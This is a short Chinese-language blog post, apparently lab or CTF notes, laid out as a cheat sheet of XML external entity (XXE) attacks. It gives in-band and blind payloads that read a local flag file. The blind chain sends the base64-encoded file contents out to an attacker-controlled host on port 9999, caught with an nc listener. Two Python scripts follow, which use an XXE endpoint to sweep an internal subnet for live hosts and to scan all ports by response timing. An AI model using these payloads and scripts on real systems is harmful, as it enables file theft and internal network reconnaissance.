Loading

xxe

XXE

有回显读取本地敏感文件

  1. payload.dtd
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE roottag [
<!ENTITY % start "<![CDATA[">
<!ENTITY % goodies SYSTEM "file:///c:/flag.txt">
<!ENTITY % end "]]>">
<!ENTITY % dtd SYSTEM "http://192.168.10.30/evil.dtd"> #本地IP
%dtd; ]>

<roottag>&all;</roottag>
  1. evil.dtd
<?xml version="1.0" encoding="UTF-8"?>
<!ENTITY all "%start;%goodies;%end;">

无回显读取本地敏感文件

  1. payload.dtd
<!DOCTYPE convert [
<!ENTITY % remote SYSTEM "http://192.168.10.30/evil.dtd"> #本地IP
%remote;%int;%send;
]>
  1. evil.dtd
<!ENTITY % file SYSTEM "php://filter/read=convert.base64-encode/resource=file:///c:/flag.txt">
<!ENTITY % int "<!ENTITY &#37; send SYSTEM 'http://192.168.10.30:9999?p=%file;'>"> #本地IP
  1. nc监听9999端口

内网主机探测

import requests
import base64

def XXE(ip,string):
    try:
        xml = """<?xml version="1.0" encoding="ISO-8859-1"?>"""
        xml = xml + "\r\n" + """<!DOCTYPE foo [ <!ELEMENT foo ANY >"""
        xml = xml + "\r\n" + """<!ENTITY xxe SYSTEM """ + '"' + string + '"' + """>]>"""
        xml = xml + "\r\n" + """<xml>"""
        xml = xml + "\r\n" + """ <stuff>&xxe;</stuff>"""
        xml = xml + "\r\n" + """</xml>"""
        x = requests.post('http://192.168.38.132/xxe_test.php', data=xml, headers=headers, timeout=5).text #记得修改靶机地址
        coded_string = x.split(' ')[-2]
        print(' [+]',ip,'Successfully Found !!!')
    except:
        print(' [-]',ip,'Error')

if __name__ == '__main__':
    headers = {'Content-Type':'application/xml'}
    for i in range(1,255):
        ip = '192.168.38.' + str(i) #记得修改IP段
        string = 'php://filter/convert.base64-encode/resource=http://' + ip + '/'
        XXE(ip,string)

内网主机端口扫描

import requests
import base64

def XXE(port):
    xml = """<?xml version="1.0" encoding="utf-8"?> """
    xml = xml + "\r\n" + """<!DOCTYPE data SYSTEM "http://192.168.38.129:""" + str(port) + """/" ["""
    xml = xml + "\r\n" + """<!ELEMENT data (#PCDATA)> """
    xml = xml + "\r\n" + """]>"""
    xml = xml + "\r\n" + """<data>7</data>"""
    r = requests.post('http://192.168.38.132/xxe_test.php', data=xml,timeout=5) #记得修改靶机地址
    print(port,r.elapsed.total_seconds())

if __name__ == '__main__':
    for i in range(1,65535):
        XXE(i)
posted @ 2022-06-13 09:11  amazingman113  阅读(144)  评论(0)    收藏  举报